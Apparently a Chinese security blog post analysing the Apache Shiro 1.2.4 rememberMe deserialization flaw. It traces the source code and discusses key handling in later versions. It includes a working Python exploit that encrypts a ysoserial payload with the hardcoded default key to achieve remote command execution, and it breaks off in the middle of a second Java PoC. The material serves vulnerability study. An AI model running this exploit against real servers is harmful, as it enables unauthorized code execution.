
<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  <title>shiro 1.2.4反序列化及扩展思考 | 离怀秋</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="前言本篇为对shiro-550反序列化漏洞的分析以及扩展问题的思考">
<meta property="og:type" content="article">
<meta property="og:title" content="shiro 1.2.4反序列化及扩展思考">
<meta property="og:url" content="http://yoursite.com/2020/10/06/shiro-1-2-4%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8F%8A%E6%89%A9%E5%B1%95%E6%80%9D%E8%80%83/index.html">
<meta property="og:site_name" content="离怀秋">
<meta property="og:description" content="前言本篇为对shiro-550反序列化漏洞的分析以及扩展问题的思考">
<meta property="og:image" content="https://s1.ax1x.com/2020/09/30/0neJOA.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/09/30/0uGU9s.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/09/30/0uYEJH.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/09/30/0utZAU.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/09/30/0uU5kT.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/09/30/0u8tQx.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/10/02/0QUGxe.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/10/02/0Qr9Qf.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/10/02/0QrdOO.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/10/02/0lVsyD.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/10/02/0lQNPH.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/10/04/085G90.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/10/04/087axx.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/10/04/08Ht0S.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/10/04/08zm01.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/10/04/0GCFER.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/10/04/0G3ViV.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/10/04/0GG5GV.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/10/04/0GtA8P.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/10/04/0GU1XT.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/10/04/0GXBBq.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/10/04/0GTLm8.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/10/04/0G7C60.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/10/04/0Gqq3j.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/10/04/0GLGrt.png">
<meta property="og:image" content="https://s1.ax1x.com/2020/10/04/0GOQoT.png">
<meta property="article:published_time" content="2020-10-06T03:20:30.000Z">
<meta property="article:modified_time" content="2020-10-06T03:25:03.315Z">
<meta property="article:author" content="离怀秋">
<meta property="article:tag" content="java">
<meta property="article:tag" content="shiro">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://s1.ax1x.com/2020/09/30/0neJOA.png">
  
    <link rel="alternative" href="/atom.xml" title="离怀秋" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
<link rel="stylesheet" href="/css/style.css">

  <!--[if lt IE 9]><script src="//cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7/html5shiv.min.js"></script><![endif]-->
  
<meta name="generator" content="Hexo 4.2.1"></head>
<body>
<div id="container">
  <div id="wrap">
    <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">离怀秋</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
          <a class="main-nav-link" href="/about">About</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//www.baidu.com/baidu" method="get" accept-charset="utf-8" class="search-form">
          <input type="search" name="word" maxlength="20" class="search-form-input" placeholder="Search">
          <input type="submit" value="" class="search-form-submit">
          <input name=tn type=hidden value="bds">
          <input name=cl type=hidden value="3">
          <input name=ct type=hidden value="2097152">
          <input type="hidden" name="si" value="yoursite.com">
        </form>
      </div>
    </div>
  </div>
</header>
    <div class="outer">
      <section id="main"><article id="post-shiro-1-2-4反序列化及扩展思考" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2020/10/06/shiro-1-2-4%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8F%8A%E6%89%A9%E5%B1%95%E6%80%9D%E8%80%83/" class="article-date">
  <time datetime="2020-10-06T03:20:30.000Z" itemprop="datePublished">2020-10-06</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      shiro 1.2.4反序列化及扩展思考
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h3 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h3><p>本篇为对shiro-550反序列化漏洞的分析以及扩展问题的思考</p>
<a id="more"></a>
<h3 id="PoC"><a href="#PoC" class="headerlink" title="PoC"></a>PoC</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">import</span> uuid</span><br><span class="line"><span class="keyword">import</span> subprocess</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">from</span> Crypto.Cipher <span class="keyword">import</span> AES</span><br><span class="line"></span><br><span class="line">JAR_FILE = <span class="string">'/Users/lih3iu/Tools/ysoserial.jar'</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">poc</span><span class="params">(url, rce_command)</span>:</span></span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        payload = generator(rce_command, JAR_FILE)</span><br><span class="line">        r = requests.get(target, cookies=&#123;<span class="string">'rememberMe'</span>: payload.decode()&#125;, timeout=<span class="number">10</span>)</span><br><span class="line">        <span class="keyword">print</span> r.text</span><br><span class="line">    <span class="keyword">except</span> Exception, e:</span><br><span class="line">        <span class="keyword">pass</span></span><br><span class="line">    <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">generator</span><span class="params">(command, fp)</span>:</span></span><br><span class="line">    <span class="keyword">if</span> <span class="keyword">not</span> os.path.exists(fp):</span><br><span class="line">        <span class="keyword">raise</span> Exception(<span class="string">'jar file not found!'</span>)</span><br><span class="line">    popen = subprocess.Popen([<span class="string">'java'</span>, <span class="string">'-jar'</span>, fp, <span class="string">'CommonsCollections2'</span>, command],</span><br><span class="line">                             stdout=subprocess.PIPE)</span><br><span class="line">    BS = AES.block_size</span><br><span class="line">    pad = <span class="keyword">lambda</span> s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()</span><br><span class="line">    key = <span class="string">"kPH+bIxk5D2deZiIxcaaaA=="</span></span><br><span class="line">    mode = AES.MODE_CBC</span><br><span class="line">    iv = uuid.uuid4().bytes</span><br><span class="line">    encryptor = AES.new(base64.b64decode(key), mode, iv)</span><br><span class="line">    file_body = pad(popen.stdout.read())</span><br><span class="line">    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))</span><br><span class="line">    <span class="keyword">return</span> base64_ciphertext</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line">    poc(<span class="string">'http://127.0.0.1:8080/samples_web_1_2_4_war'</span>, <span class="string">'touch /tmp/123'</span>)</span><br></pre></td></tr></table></figure>

<h3 id="加密过程RememberMe生成分析"><a href="#加密过程RememberMe生成分析" class="headerlink" title="加密过程RememberMe生成分析"></a>加密过程RememberMe生成分析</h3><p>在正常登陆的情况下，返回包中会返回rememberMe这个字段，如下：</p>
<p><img src="https://s1.ax1x.com/2020/09/30/0neJOA.png" alt="0neJOA.png"></p>
<p>跟进看下代码中加密的过程(rememberMe的生成过程)</p>
<p>AbstractRememberMeManager#onSuccessfulLogin</p>
<p><img src="https://s1.ax1x.com/2020/09/30/0uGU9s.png" alt=""></p>
<p>在开启rememberMe的选项下，进入rememberIdentity函数</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">rememberIdentity</span><span class="params">(Subject subject, AuthenticationToken token, AuthenticationInfo authcInfo)</span> </span>&#123;</span><br><span class="line">    PrincipalCollection principals = <span class="keyword">this</span>.getIdentityToRemember(subject, authcInfo);</span><br><span class="line">    <span class="keyword">this</span>.rememberIdentity(subject, principals);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>接着进入另一个rememberIdentity函数</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">protected</span> <span class="keyword">void</span> <span class="title">rememberIdentity</span><span class="params">(Subject subject, PrincipalCollection accountPrincipals)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">byte</span>[] bytes = <span class="keyword">this</span>.convertPrincipalsToBytes(accountPrincipals);</span><br><span class="line">    <span class="keyword">this</span>.rememberSerializedIdentity(subject, bytes);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>跟进convertPrincipalsToBytes函数</p>
<p><img src="https://s1.ax1x.com/2020/09/30/0uYEJH.png" alt=""></p>
<p>可以看到这里先将包含用户登陆信息的对象进行序列化，然后通过encrypt函数进行加密</p>
<p>看下具体的序列化流程代码</p>
<p>DefaultSerializer#serializer</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">byte</span>[] serialize(T o) <span class="keyword">throws</span> SerializationException &#123;</span><br><span class="line">    <span class="keyword">if</span> (o == <span class="keyword">null</span>) &#123;</span><br><span class="line">        String msg = <span class="string">"argument cannot be null."</span>;</span><br><span class="line">        <span class="keyword">throw</span> <span class="keyword">new</span> IllegalArgumentException(msg);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        ByteArrayOutputStream baos = <span class="keyword">new</span> ByteArrayOutputStream();</span><br><span class="line">        BufferedOutputStream bos = <span class="keyword">new</span> BufferedOutputStream(baos);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            ObjectOutputStream oos = <span class="keyword">new</span> ObjectOutputStream(bos);</span><br><span class="line">            oos.writeObject(o);</span><br><span class="line">            oos.close();</span><br><span class="line">            <span class="keyword">return</span> baos.toByteArray();</span><br><span class="line">        &#125; <span class="keyword">catch</span> (IOException var6) &#123;</span><br><span class="line">            String msg = <span class="string">"Unable to serialize object ["</span> + o + <span class="string">"].  "</span> + <span class="string">"In order for the DefaultSerializer to serialize this object, the ["</span> + o.getClass().getName() + <span class="string">"] "</span> + <span class="string">"class must implement java.io.Serializable."</span>;</span><br><span class="line">            <span class="keyword">throw</span> <span class="keyword">new</span> SerializationException(msg, var6);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>接着回到刚才的流程中进入encrypt函数</p>
<p>JcaCipherService#encrypt</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">protected</span> <span class="keyword">byte</span>[] encrypt(<span class="keyword">byte</span>[] serialized) &#123;</span><br><span class="line">    <span class="keyword">byte</span>[] value = serialized;</span><br><span class="line">    CipherService cipherService = <span class="keyword">this</span>.getCipherService();</span><br><span class="line">    <span class="keyword">if</span> (cipherService != <span class="keyword">null</span>) &#123;</span><br><span class="line">        ByteSource byteSource = cipherService.encrypt(serialized, <span class="keyword">this</span>.getEncryptionCipherKey());</span><br><span class="line">        value = byteSource.getBytes();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> value;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>跟进getCipherService函数看一下</p>
<p>AbstractRememberMeManager#getCipherService</p>
<p><a href="https://imgchr.com/i/0utZAU" target="_blank" rel="noopener"><img src="https://s1.ax1x.com/2020/09/30/0utZAU.png" alt=""></a></p>
<p>这里返回的是cbc模式的AESCipherServer，并且将key和序列化的数据传进CipherServer内部的encrypt进行加密</p>
<p>跟进下getEncryptionCipherKey函数，也就是aes Key的获取函数</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">byte</span>[] getEncryptionCipherKey() &#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="keyword">this</span>.encryptionCipherKey;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">private</span> <span class="keyword">static</span> <span class="keyword">final</span> <span class="keyword">byte</span>[] DEFAULT_CIPHER_KEY_BYTES = Base64.decode(<span class="string">"kPH+bIxk5D2deZiIxcaaaA=="</span>);</span><br></pre></td></tr></table></figure>

<p>这个硬编码的密钥key也就是产生漏洞的主要原因了，最后通过以下两个encrypt函数加密并将数据赋给bytesource变量</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">    <span class="function"><span class="keyword">public</span> ByteSource <span class="title">encrypt</span><span class="params">(<span class="keyword">byte</span>[] plaintext, <span class="keyword">byte</span>[] key)</span> </span>&#123;</span><br><span class="line">        <span class="keyword">byte</span>[] ivBytes = <span class="keyword">null</span>;</span><br><span class="line">        <span class="keyword">boolean</span> generate = <span class="keyword">this</span>.isGenerateInitializationVectors(<span class="keyword">false</span>);</span><br><span class="line">        <span class="keyword">if</span> (generate) &#123;</span><br><span class="line">            ivBytes = <span class="keyword">this</span>.generateInitializationVector(<span class="keyword">false</span>);</span><br><span class="line">            <span class="keyword">if</span> (ivBytes == <span class="keyword">null</span> || ivBytes.length == <span class="number">0</span>) &#123;</span><br><span class="line">                <span class="keyword">throw</span> <span class="keyword">new</span> IllegalStateException(<span class="string">"Initialization vector generation is enabled - generated vectorcannot be null or empty."</span>);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">return</span> <span class="keyword">this</span>.encrypt(plaintext, key, ivBytes, generate);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">///</span></span><br><span class="line">    <span class="function"><span class="keyword">private</span> ByteSource <span class="title">encrypt</span><span class="params">(<span class="keyword">byte</span>[] plaintext, <span class="keyword">byte</span>[] key, <span class="keyword">byte</span>[] iv, <span class="keyword">boolean</span> prependIv)</span> <span class="keyword">throws</span> CryptoException </span>&#123;</span><br><span class="line">        <span class="keyword">int</span> MODE = <span class="keyword">true</span>;</span><br><span class="line">        <span class="keyword">byte</span>[] output;</span><br><span class="line">        <span class="keyword">if</span> (prependIv &amp;&amp; iv != <span class="keyword">null</span> &amp;&amp; iv.length &gt; <span class="number">0</span>) &#123;</span><br><span class="line">            <span class="keyword">byte</span>[] encrypted = <span class="keyword">this</span>.crypt(plaintext, key, iv, <span class="number">1</span>);</span><br><span class="line">            output = <span class="keyword">new</span> <span class="keyword">byte</span>[iv.length + encrypted.length];</span><br><span class="line">            System.arraycopy(iv, <span class="number">0</span>, output, <span class="number">0</span>, iv.length);</span><br><span class="line">            System.arraycopy(encrypted, <span class="number">0</span>, output, iv.length, encrypted.length);</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            output = <span class="keyword">this</span>.crypt(plaintext, key, iv, <span class="number">1</span>);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (log.isTraceEnabled()) &#123;</span><br><span class="line">            log.trace(<span class="string">"Incoming plaintext of size "</span> + (plaintext != <span class="keyword">null</span> ? plaintext.length : <span class="number">0</span>) + <span class="string">".  Ciphertext "</span> + <span class="string">"byte array is size "</span> + (output != <span class="keyword">null</span> ? output.length : <span class="number">0</span>));</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">return</span> Util.bytes(output);</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>逻辑回到前面的代码，得到数据后，再次进入rememberSerializedIdentity函数，我们刚才传进去的byte作为serialized变量被base64加密后设置在Cookie中</p>
<p><img src="https://s1.ax1x.com/2020/09/30/0uU5kT.png" alt="0uU5kT.png"></p>
<p>将得到的数据设置在cookie中，整个流程结束</p>
<p>同时我们也可以将得到的数据，解密并验证，也看到了aced0005的序列化标志。</p>
<p><img src="https://s1.ax1x.com/2020/09/30/0u8tQx.png" alt=""></p>
<h3 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h3><p>漏洞的话大体流程和加密过程类似，只不过是反过来了</p>
<p>AbstractRememberMeManager#getRememberedPrincipals</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">    <span class="function"><span class="keyword">public</span> PrincipalCollection <span class="title">getRememberedPrincipals</span><span class="params">(SubjectContext subjectContext)</span> </span>&#123;</span><br><span class="line">        PrincipalCollection principals = <span class="keyword">null</span>;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">➡️            <span class="keyword">byte</span>[] bytes = <span class="keyword">this</span>.getRememberedSerializedIdentity(subjectContext);</span><br><span class="line">            <span class="keyword">if</span> (bytes != <span class="keyword">null</span> &amp;&amp; bytes.length &gt; <span class="number">0</span>) &#123;</span><br><span class="line">                principals = <span class="keyword">this</span>.convertBytesToPrincipals(bytes, subjectContext);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125; <span class="keyword">catch</span> (RuntimeException var4) &#123;</span><br><span class="line">            principals = <span class="keyword">this</span>.onRememberedPrincipalFailure(var4, subjectContext);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">return</span> principals;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>跟进getRememberedSerializedIdentity函数</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">protected</span> <span class="keyword">byte</span>[] getRememberedSerializedIdentity(SubjectContext subjectContext) &#123;</span><br><span class="line">    <span class="keyword">if</span> (!WebUtils.isHttp(subjectContext)) &#123;</span><br><span class="line">    ...</span><br><span class="line">            HttpServletRequest request = WebUtils.getHttpRequest(wsc);</span><br><span class="line">            HttpServletResponse response = WebUtils.getHttpResponse(wsc);</span><br><span class="line">            String base64 = <span class="keyword">this</span>.getCookie().readValue(request, response);</span><br><span class="line">            <span class="keyword">if</span> (<span class="string">"deleteMe"</span>.equals(base64)) &#123;</span><br><span class="line">                <span class="keyword">return</span> <span class="keyword">null</span>;</span><br><span class="line">            &#125; <span class="keyword">else</span> <span class="keyword">if</span> (base64 != <span class="keyword">null</span>) &#123;</span><br><span class="line">                base64 = <span class="keyword">this</span>.ensurePadding(base64);</span><br><span class="line">                <span class="keyword">if</span> (log.isTraceEnabled()) &#123;</span><br><span class="line">                    log.trace(<span class="string">"Acquired Base64 encoded identity ["</span> + base64 + <span class="string">"]"</span>);</span><br><span class="line">                &#125;</span><br><span class="line"></span><br><span class="line">                <span class="keyword">byte</span>[] decoded = Base64.decode(base64);</span><br><span class="line">                <span class="keyword">if</span> (log.isTraceEnabled()) &#123;</span><br><span class="line">                    log.trace(<span class="string">"Base64 decoded byte array length: "</span> + (decoded != <span class="keyword">null</span> ? decoded.length : <span class="number">0</span>) + <span class="string">" bytes."</span>);</span><br><span class="line">                &#125;</span><br><span class="line"></span><br><span class="line">                <span class="keyword">return</span> decoded;</span><br><span class="line">            &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                <span class="keyword">return</span> <span class="keyword">null</span>;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>通过readValue函数获得rememberMe字段</p>
<p><img src="https://s1.ax1x.com/2020/10/02/0QUGxe.png" alt=""></p>
<p>最后再进行base64解密返回，并传给convertBytesToPrincipals函数</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">protected</span> PrincipalCollection <span class="title">convertBytesToPrincipals</span><span class="params">(<span class="keyword">byte</span>[] bytes, SubjectContext subjectContext)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (<span class="keyword">this</span>.getCipherService() != <span class="keyword">null</span>) &#123;</span><br><span class="line">        bytes = <span class="keyword">this</span>.decrypt(bytes);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="keyword">this</span>.deserialize(bytes);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>再进入decrypt函数</p>
<p><img src="https://s1.ax1x.com/2020/10/02/0Qr9Qf.png" alt="0Qr9Qf.png"></p>
<p>依然是通过aescipherService将数据进行解密，然后返回进入deserialize函数</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">protected</span> PrincipalCollection <span class="title">deserialize</span><span class="params">(<span class="keyword">byte</span>[] serializedIdentity)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">return</span> (PrincipalCollection)<span class="keyword">this</span>.getSerializer().deserialize(serializedIdentity);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>



<p><img src="https://s1.ax1x.com/2020/10/02/0QrdOO.png" alt="0QrdOO.png"></p>
<p>这里的话就看到了熟悉的readObject反序列化了，对数据进行反序列化，所以如果classpath存在有反序列化链的话则可以构造对应的反序列化数据来触发此漏洞</p>
<h3 id="shiro版本1-4-0-的一些问题"><a href="#shiro版本1-4-0-的一些问题" class="headerlink" title="shiro版本1.4.0+的一些问题"></a>shiro版本1.4.0+的一些问题</h3><p>在1.2.25给出了关于密钥的修复方案</p>
<p><img src="https://s1.ax1x.com/2020/10/02/0lVsyD.png" alt="0lVsyD.png"></p>
<p>舍弃了默认key硬编码的方式，改为通过generateNewKey函数来产生一个新的随机的key，按理来说这确实没什么问题，不过一些开源框架中会把key默认写在配置文件中，而通过任意文件读取漏洞/key包就可能同样达到rce的效果</p>
<p>这里用ruoyi后台管理系统举下例子（在今年的强网final中同样也有了ruoyi作为rw的一道题）</p>
<p>在ShiroConfig.java中有如下代码</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">    <span class="function"><span class="keyword">public</span> CookieRememberMeManager <span class="title">rememberMeManager</span><span class="params">()</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        CookieRememberMeManager cookieRememberMeManager = <span class="keyword">new</span> CookieRememberMeManager();</span><br><span class="line">        cookieRememberMeManager.setCookie(rememberMeCookie());</span><br><span class="line">        cookieRememberMeManager.setCipherKey(Base64.decode(cipherKey));</span><br><span class="line">        <span class="keyword">return</span> cookieRememberMeManager;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">//cipherkey的获取</span></span><br><span class="line"></span><br><span class="line">    <span class="meta">@Value</span>(<span class="string">"$&#123;shiro.cookie.cipherKey&#125;"</span>)</span><br><span class="line">    <span class="keyword">private</span> String cipherKey;</span><br></pre></td></tr></table></figure>

<p>通过rememberMeManager函数来设置shire-web jar包中的cipher key，所以在框架启动时这个key就相当于shirt 1.2.4的硬编码密码了</p>
<p>那么对于shirt 1.4.0+的反序列化漏洞 网上的大多数脚本都将失效，因为shiro1.4.0舍弃了cbc模式，变成了GCM模式</p>
<p> <img src="https://s1.ax1x.com/2020/10/02/0lQNPH.png" alt="0lQNPH.png"></p>
<p>所以还是直接采用自带的cipherServer去加密比较好</p>
<p>PoC如下</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> org.apache.shiro.crypto.AesCipherService;</span><br><span class="line"><span class="keyword">import</span> org.apache.shiro.codec.CodecSupport;</span><br><span class="line"><span class="keyword">import</span> org.apache.shiro.util.ByteSource;</span><br><span class="line"><span class="keyword">import</span> org.apache.shiro.codec.Base64;</span><br><span class="line"><span class="keyword">import</span> org.apache.shiro.io.DefaultSerializer;</span><br><span class="line"><span class="keyword">import</span> java.nio.file.FileSystems;</span><br><span class="line"><span class="keyword">import</span> java.nio.file.Files;</span><br><span class="line"><span class="keyword">import</span> java.nio.file.Paths;</span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">TestRemember</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span 